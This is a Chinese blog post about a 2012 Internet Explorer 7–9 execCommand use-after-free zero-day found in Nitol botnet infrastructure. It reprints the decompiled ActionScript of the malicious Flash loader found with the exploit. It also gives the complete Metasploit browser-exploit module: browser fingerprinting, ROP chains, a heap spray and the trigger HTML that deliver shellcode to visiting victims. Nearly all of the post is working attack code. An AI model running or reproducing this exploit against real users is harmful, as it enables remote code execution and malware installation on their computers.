IE 0day来袭,附Metasploit脚本

有老外发表了一篇文章,在追踪前几日被微软关闭的Nitol僵尸网络时,发现了一个IE的0day漏洞,并且发现了利用的exploit,影响范围为IE7-IE8。

作者一直在暗中监控几个被Nitro感染并且控制的服务器,14号早晨,突然发现一台意大利的服务器上多出了一个名为“/public/help”的文件夹,于是把它们全部打包下载了来分析。在使用一台完全补丁的XP+IE+FLASH电脑调试下载的文件的时候,发现居然有文件下载执行。一个新0day就这样被捡到了。。囧。

作者对整个漏洞的利用进行了一些分析:
http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/

但是貌似作者对111.exe没有分析清楚,应该是一个后门远控之类的东西,而且从整个描述看来,貌似是国内人整的哟,已经成功使用Metasploit实现了该漏洞的利用

附111.exe的下载地址:
http://jsunpack.jeek.org/?report=50c43f5297aaab2a21309a88c3007c3318ea9f17

Moh2010.swf反编译AS代码:

//ActionScript 3.0
//  class Ϣߐ
package 
{
    import flash.display.*;
    import flash.events.*;
    import flash.net.*;
    import flash.system.*;
    import flash.utils.*;
    import laan.smart.proxies.filesystem.*;

    public dynamic class Ϣߐ extends flash.display.MovieClip
    {
        public function Ϣߐ()
        {
            super();
            if (flash.system.Security.sandboxType != "application") 
            {
                flash.system.Security.allowDomain("*");
            }
            if (stage) 
            {
                this.init();
            }
            else 
            {
                addEventListener(flash.events.Event.ADDED_TO_STAGE, this.init);
            }
            return;
        }

        internal function init(arg1:flash.events.Event):void
        {
            var loc6:*=null;
            var loc5:*=null;
            var loc4:*=null;
            var loc3:*=null;
            var loc2:*=null;
            var loc1:*=null;
            loc4 = null;
            loc5 = null;
            loc6 = 0;
            loc1 = this.init[0];
            loc2 = this.init[1];
            loc3 = 3;
            while (loc3-- > 0) 
            {
                (loc4 = new flash.utils.ByteArray()).writeBytes(loc2);
                loc4.position = loc4.length;
                loc4.endian = flash.utils.Endian.LITTLE_ENDIAN;
                loc5 = new flash.utils.ByteArray();
                loc6 = Math.random() * Math.min(loc1, 2 * 1024 * 1024);
                while (loc5.length < loc6) 
                {
                    loc5.writeBytes(loc2, Math.random() * loc2.length / 3);
                }
                loc5.length = loc6;
                if (loc5.length >= 63) 
                {
                    loc4.writeShort(87 << 6 | 63);
                    loc4.writeUnsignedInt(loc5.length);
                }
                else 
                {
                    loc4.writeShort(87 << 6 | loc5.length);
                }
                loc4.writeBytes(loc5);
                loc4.writeShort(1 << 6);
                loc4.writeShort(0);
                loc4.position = 4;
                loc4.writeUnsignedInt(loc4.length);
                this.init.writeBytes(loc4);
                if (!(this.init.length > 30 * 1024 * 1024)) 
                {
                    continue;
                }
                removeEventListener(flash.events.Event.ENTER_FRAME, this.init);
                break;
            }
            return;
        }

        internal function init(arg1:flash.utils.ByteArray):void
        {
            var loc3:*=null;
            var loc2:*=null;
            var loc1:*=null;
            this.init = [];
            loc1 = arg1.readUnsignedInt();
            loc2 = arg1.readUnsignedInt();
            loc3 = new flash.utils.ByteArray();
            arg1.readBytes(loc3, 0, loc2);
            this.init = new flash.utils.ByteArray();
            this.init.endian = flash.utils.Endian.LITTLE_ENDIAN;
            this.init = [loc1, loc3];
            addEventListener(flash.events.Event.ENTER_FRAME, this.init);
            this.init(null);
            return;
        }

        internal function init(arg1:flash.events.Event=null):void
        {
            var loc1:*=null;
            loc1 = null;
            if (arg1) 
            {
                removeEventListener(flash.events.Event.ADDED_TO_STAGE, this.init);
            }
            this.LOADING_BAR_CLASS = new flash.system.LoaderContext(false, flash.system.ApplicationDomain.currentDomain);
            if (this.LOADING_BAR_CLASS.hasOwnProperty("allowLoadBytesCodeExecution")) 
            {
                Object(this.LOADING_BAR_CLASS).allowLoadBytesCodeExecution = true;
            }
            if (this.LOADING_BAR_CLASS.hasOwnProperty("parameters")) 
            {
                Object(this.LOADING_BAR_CLASS)["parameters"] = stage.loaderInfo.parameters;
            }
            flash.display.StageAlign.prototype["@doswf__s"] = stage;
            flash.display.StageAlign.prototype.setPropertyIsEnumerable("@doswf__s", false);
            flash.display.LoaderInfo.prototype["@doswf__u"] = stage.loaderInfo.url;
            flash.display.LoaderInfo.prototype.setPropertyIsEnumerable("@doswf__u", false);
            flash.display.LoaderInfo.prototype["@doswf__p"] = stage.loaderInfo.parameters;
            flash.display.LoaderInfo.prototype.setPropertyIsEnumerable("@doswf__p", false);
            if (flash.system.ApplicationDomain.currentDomain.hasDefinition(LOADING_BAR_CLASS)) 
            {
                loc1 = flash.system.ApplicationDomain.currentDomain.getDefinition(LOADING_BAR_CLASS) as Class;
                this.LOADING_BAR_CLASS = new loc1() as flash.display.DisplayObject;
                addChild(this.LOADING_BAR_CLASS);
                stop();
                addEventListener(flash.events.Event.ENTER_FRAME, this.init);
            }
            else 
            {
                this.init();
            }
            return;
        }

        internal function init():void
        {
            var loc1:*=null;
            loc1 = this.init(new Ϣߑ());
            loc1.uncompress();
            this.init(loc1);
            return;
        }

        internal function init(arg1:flash.events.Event):void
        {
            var loc1:*=null;
            loc1 = loaderInfo.bytesLoaded / loaderInfo.bytesTotal;
            Object(this.LOADING_BAR_CLASS).setProgress(this, loc1);
            if (loc1 == 1) 
            {
                removeEventListener(flash.events.Event.ENTER_FRAME, this.init);
                removeChild(this.LOADING_BAR_CLASS);
                gotoAndStop(2);
                this.init();
            }
            return;
        }

        internal function init(arg1:flash.utils.ByteArray):void
        {
            var loc3:*=null;
            var loc2:*=null;
            var loc1:*=null;
            arg1.endian = flash.utils.Endian.LITTLE_ENDIAN;
            arg1.position = 0;
            if (arg1.readBoolean()) 
            {
                this.init(arg1);
            }
            this.init = arg1.readBoolean();
            loc1 = arg1.readUnsignedInt();
            loc2 = new flash.utils.ByteArray();
            arg1.readBytes(loc2, 0, loc1);
            this.LOADING_BAR_CLASS = new flash.utils.ByteArray();
            arg1.readBytes(this.LOADING_BAR_CLASS);
            (loc3 = new flash.display.Loader()).contentLoaderInfo.addEventListener(flash.events.Event.INIT, this.init);
            loc3.contentLoaderInfo.addEventListener(flash.events.ProgressEvent.PROGRESS, this.init);
            loc3.loadBytes(loc2, this.LOADING_BAR_CLASS);
            return;
        }

        internal function init(arg1:flash.events.Event):void
        {
            var loc6:*=null;
            var loc5:*=null;
            var loc4:*=null;
            var loc3:*=null;
            var loc2:*=null;
            var loc1:*=null;
            loc3 = null;
            loc4 = 0;
            loc5 = undefined;
            if (arg1 is flash.events.ProgressEvent) 
            {
                this.init = arg1 as flash.events.ProgressEvent;
                return;
            }
            loc1 = arg1.target as flash.display.LoaderInfo;
            loc1.removeEventListener(flash.events.Event.INIT, this.init);
            loc1.removeEventListener(flash.events.ProgressEvent.PROGRESS, this.init);
            loc2 = loc1.loader;
            if (this.LOADING_BAR_CLASS) 
            {
                loc2 = new flash.display.Loader();
                loc2.contentLoaderInfo.addEventListener(flash.events.Event.INIT, this.init);
                loc2.contentLoaderInfo.addEventListener(flash.events.ProgressEvent.PROGRESS, this.init);
                loc2.loadBytes(this.LOADING_BAR_CLASS, this.LOADING_BAR_CLASS);
                this.LOADING_BAR_CLASS = null;
                return;
            }
            if (parent is flash.display.Stage) 
            {
                if (this.init) 
                {
                    parent.addChildAt(loc2.content, 0);
                    parent.removeChild(this);
                }
                else 
                {
                    addChild(loc2);
                }
            }
            else if (this.init) 
            {
                addChildAt(loc2.content, 0);
            }
            else 
            {
                addChildAt(loc2, 0);
            }
            if (this.init && this.init) 
            {
                if ((loc3 = loc1.content as flash.display.DisplayObjectContainer).hasOwnProperty("@doswf__lph")) 
                {
                    (loc6 = Object(loc3))["@doswf__lph"](this.init);
                }
                else 
                {
                    loc4 = 0;
                    while (loc4 < loc3.numChildren) 
                    {
                        if ((loc5 = loc3.getChildAt(loc4)).hasOwnProperty("@doswf__lph")) 
                        {
                            (loc6 = loc5)["@doswf__lph"](this.init);
                        }
                        ++loc4;
                    }
                }
            }
            return;
        }

        internal function init(arg1:flash.utils.ByteArray):flash.utils.ByteArray
        {
            var loc3:*=null;
            var loc2:*=null;
            var loc1:*=null;
            loc3 = 0;
            arg1.endian = flash.utils.Endian.LITTLE_ENDIAN;
            arg1.position = 0;
            this.init = (arg1.readUnsignedByte() - 1);
            this.init = (arg1.readUnsignedByte() - 1);
            this.init = arg1.readUnsignedInt() - 2;
            this.init = arg1.readUnsignedInt() - 2;
            loc1 = new flash.utils.ByteArray();
            loc1.writeBytes(arg1, arg1.length - this.init, this.init);
            loc2 = 0;
            for (;;) 
            {
                loc3 = 0;
                while (loc3 < this.init) 
                {
                    loc1[loc2] = loc1[loc2] ^ this.init;
                    ++loc2;
                    if (loc2 >= this.init) 
                    {
                        break;
                    }
                    loc3 = loc3 + 5;
                }
                loc2 = loc2 + this.init;
                if (!(loc2 >= this.init)) 
                {
                    continue;
                }
                break;
            }
            return loc1;
        }

        internal static const LOADING_BAR_CLASS:String="_doswf_package.LoadingBarBase";

        internal var init:uint;

        internal var init:uint;

        internal var init:uint;

        internal var init:*;

        internal var init:uint;

        internal var init:*;

        internal var init:*;

        internal var init:*;

        internal var LOADING_BAR_CLASS:*;

        internal var LOADING_BAR_CLASS:*;

        internal var LOADING_BAR_CLASS:*;
    }
}

//  class Ϣߑ
package 
{
    import flash.utils.*;

    public class Ϣߑ extends flash.utils.ByteArray
    {
        public function Ϣߑ()
        {
            super();
            return;
        }
    }
}

Metasploit脚本:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		 :ua_name    => HttpClients::IE,
		 :ua_minver  => "7.0",
		 :ua_maxver  => "9.0",
		 :javascript => true,
		 :rank       => GoodRanking
	 })

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
			'Description'    => %q{
				This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
				rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
				but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
				to a use-after-free condition.  Please note that this vulnerability has
				been exploited in the wild since Sep 14 2012, and there is currently no official
				patch for it.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'unknown',     # Some secret ninja
					'eromang',     # First public discovery
					'binjo',
					'sinn3r',      # Metasploit
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'OSVDB', '85532' ],
					[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ],
					[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'],
					[ 'URL', 'http://metasploit.com' ]
				],
			'Payload'        =>
				{
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "none",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5fa', 'Random' => false } ],
					[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5fa', 'Random' => false } ],
					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 9 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5fc', 'Random' => true } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Sep 14 2012",  # When it was spotted in the wild by eromang
			'DefaultTarget'  => 0))
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[1]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[2]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[3]  #IE 7 on Windows Vista
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
			return targets[4]  #IE 8 on Windows Vista
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
			return targets[5]  #IE 8 on Windows 7
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
			return targets[6]  #IE 9 on Windows 7
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V")[0].to_i
	end

	def nop
		return make_nops(4).unpack("V")[0].to_i
	end

	def get_payload(t, cli)
		code = payload.encoded

		# No rop. Just return the payload.
		return code if t['Rop'].nil?

		# Both ROP chains generated by mona.py - See corelan.be
		case t['Rop']
		when :msvcrt
			print_status("Using msvcrt ROP")
			exec_size = code.length
			stack_pivot = [
				0x77c4e393, # RETN
				0x77c4e392, # POP EAX # RETN
				0x77c15ed5, # XCHG EAX, ESP # RETN
			].pack("V*")
			rop =
			[
				0x77C21891,  # POP ESI # RETN
				0x0c0c0c04,  # ESI
				0x77c4e392,  # POP EAX # RETN
				0x77c11120,  # <- *&VirtualProtect()
				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77c2dd6c,  # XCHG EAX,ESI # ADD [EAX], AL # RETN
				0x77c4ec00,  # POP EBP # RETN
				0x77c35459,  # ptr to 'push esp #  ret'
				0x77c47705,  # POP EBX # RETN
				exec_size,   # EBX
				0x77c3ea01,  # POP ECX # RETN
				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
				0x77c46100,  # POP EDI # RETN 
				0x77c46101,  # ROP NOP (-> edi)
				0x77c4d680,  # POP EDX # RETN
				0x00000040,  # newProtect (0x40) (-> edx)
				0x77c4e392,  # POP EAX # RETN
				nop,         # NOPS (-> eax)
				0x77c12df9,  # PUSHAD # RETN
			].pack("V*")

		when :jre
			print_status("Using JRE ROP")
			exec_size = 0xffffffff - code.length + 1
			if t['Random']
				stack_pivot = [
					0x0c0c0c0c, # 0c0c0c08
					0x7c347f98, # RETN
					0x7c347f97, # POP EDX # RETN
					0x7c348b05  # XCHG EAX, ESP # RET
				].pack("V*")
			else
				stack_pivot = [
					0x7c347f98, # RETN
					0x7c347f97, # POP EDX # RETN
					0x7c348b05  # XCHG EAX, ESP # RET
				].pack("V*")
			end
			rop =
			[
				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
				exec_size,   # Value to negate, will become 0x00000201 (dwSize)
				0x7c347f98,  # RETN (ROP NOP)
				0x7c3415a2,  # JMP [EAX]
				0xffffffff,
				0x7c376402,  # skip 4 bytes
				0x7c351e05,  # NEG EAX # RETN
				0x7c345255,  # INC EBX # FPATAN # RETN
				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
				0x7c344f87,  # POP EDX # RETN
				0xffffffc0,  # Value to negate, will become 0x00000040
				0x7c351eb1,  # NEG EDX # RETN
				0x7c34d201,  # POP ECX # RETN
				0x7c38b001,  # &Writable location
				0x7c347f97,  # POP EAX # RETN
				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
				0x7c345c30,  # ptr to 'push esp #  ret '
			].pack("V*")
		end

		code = stack_pivot + rop + code
		return code
	end

	# Spray published by corelanc0d3r
	# Exploit writing tutorial part 11 : Heap Spraying Demystified
	# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
	def get_random_spray(t, js_code, js_nops)

		spray = <<-JS

		function randomblock(blocksize)
		{
			var theblock = "";
			for (var i = 0; i < blocksize; i++)
			{
				theblock += Math.floor(Math.random()*90)+10;
			}
			return theblock;
		}

		function tounescape(block)
		{
			var blocklen = block.length;
			var unescapestr = "";
			for (var i = 0; i < blocklen-1; i=i+4)
			{
				unescapestr += "%u" + block.substring(i,i+4);
			}
			return unescapestr;
		}

		var heap_obj = new heapLib.ie(0x10000);

		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset_length = #{t['Offset']};

		for (var i=0; i < 0x1000; i++) {
			var padding = unescape(tounescape(randomblock(0x1000)));
			while (padding.length < 0x1000) padding+= padding;
			var junk_offset = padding.substring(0, offset_length);
			var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
			while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
			sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
			heap_obj.alloc(sprayblock);
		}

		JS

		return spray
	end

	def get_spray(t, js_code, js_nops)
		js = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();

		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}

		var overflow = nops.substring(0, 10);
		JS
	end


	def load_html1(cli, my_target)
		p = get_payload(my_target, cli)

		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
		js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

		if my_target['Random']
			js = get_random_spray(my_target, js_code, js_r_nops)
		else
			js = get_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		html = <<-EOS
		<html>
			<body>
				<script>
					var arrr = new Array();
					arrr[0] = window.document.createElement("img");
					arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
				</script>

				<iframe src="#{this_resource}/#{@html2_name}"></iframe>
				<script>
					#{js}
		        </script>
			</body>
		</html>
		EOS

		return html
	end

	def load_html2
		html = %Q|
		<HTML>
			<script>
				function funcB() {
					document.execCommand("selectAll");
				};

				function funcA() {
					document.write("#{Rex::Text.rand_text_alpha(1)}");
					parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
				}

			</script>
			<body onload='funcB();' onselect='funcA()'>
				<div contenteditable='true'>
					a
				</div>
			</body>
		</HTML>
		|

		return html
	end

	def this_resource
		r = get_resource
		return ( r == '/') ? '' : r
	end

	def on_request_uri(cli, request)
		print_status request.headers['User-Agent']
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported, sending a 404: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		vprint_status("Requesting: #{request.uri}")

		if request.uri =~ /#{@html2_name}/
			print_status("Loading #{@html2_name}")
			html = load_html2
		elsif request.uri =~ /#{@html1_name}/
			print_status("Loading #{@html1_name}")
			html = load_html1(cli, my_target)
		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
			print_status("Redirecting to #{@html1_name}")
			send_redirect(cli, "#{this_resource}/#{@html1_name}")
			return
		else
			send_not_found(cli)
			return
		end

		html = html.gsub(/^\t\t/, '')

		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

	def exploit
		@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
		@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
		super
	end

end


=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07            mov     eax,dword ptr [edi]  ds:0023:0c0c0c08=????????

0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07            mov     eax,dword ptr [edi]
637d4650 57              push    edi
637d4651 ff5008          call    dword ptr [eax+8]

0:008> k
ChildEBP RetAddr  
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end
本文标题:IE 0day来袭,附Metasploit脚本
本文链接:https://www.nigesb.com/ie-0day-found.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

2 条评论。

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>